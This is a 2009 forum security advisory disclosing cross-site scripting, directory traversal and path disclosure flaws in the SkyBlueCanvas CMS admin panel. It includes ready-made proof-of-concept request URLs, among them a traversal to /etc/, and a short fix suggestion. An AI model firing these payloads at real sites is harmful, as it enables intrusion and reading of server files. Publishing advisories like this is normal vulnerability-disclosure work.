SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities - InterN0T

**MaXe** · #1 12th June 2009, 20:51

SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

Version Affected: 1.1 r237 (newest version: 1.1 r246)

Info: SkyBlueCanvas Lightweight CMS is an open source, free
content management system written in php and built specifically
for small web sites. The entire site you are viewing is a
demonstration of the SkyBlueCanvas lightweight CMS.
SkyBlueCanvas is custom-built for those instances when more
robust systems like Joomla, WordPress and Drupal are too much
horsepower.

Credits: InterN0T

External Links:
http://www.skybluecanvas.com

-:: The Advisory ::-

Quote:

Vulnerable Function / ID Calls:
mgroup, mgr, objtype, id & dir.

Cross Site Scripting: (requires administrator access - will not survive a login screen)
http://[HOST]/skybluecanvas/admin.php?mgroup=" onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2
http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr=" onmouseover=alert(0) > &com=manager

Impossible XSS: (XML errors or hidden tags preventing use of event handlers.)
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS
http://[HOST]skybluecanvas/admin.php?mgroup=settings&mgr=configuration&objtyp e=">XSS
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page&sub=e ditpage&id=" onfocus=alert(0) >
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS

Path Content Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/
-- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/
--=-- In the above, if One goes to a folder with many subdirectories the above will fail due to a memory allocation flaw.

Path Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media& dir=all&sub=move&id='
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media& dir=all&sub=rename&id='

-:: Solution ::-
Filter event handlers out from function calls.

Conclusion:
Pretty secure system overall but if One is a little inventive, then the above issues might be exploitable.

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.

All of the best,
MaXe

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

LinkBacks (?) LinkBack to this Thread: http://forum.intern0t.net/intern0t-advisories/1120-skybluecanvas-1-1-r237-multiple-vulnerabilities.html
Posted By	For	Type	Date
CVE - CVE-2009-2116 (under review)	This thread	Refback	28th January 2010 07:45
ISS X-Force Database: skybluecanvas-admin-path-disclosure(51164): SkyBlueCanvas admin.php path disclosure	This thread	Refback	22nd June 2009 16:21
SkyBlueCanvas Cross-Site Scripting Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com	This thread	Refback	16th June 2009 15:56

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
AMember 3.1.7 - Multiple Vulnerabilities	MaXe	InterN0T - Advisories	11	27th September 2009 18:09
transLucid 1.75 - Multiple Vulnerabilities	MaXe	InterN0T - Advisories	0	12th June 2009 21:02
Pivot 1.40.4-7 - Multiple Vulnerabilities	MaXe	InterN0T - Advisories	0	12th June 2009 20:47
Thelia 1.3.5 Multiple Vulnerabilities Exploit	hestas	Exploits, Vulnerabilities & PoCs	0	7th July 2008 02:50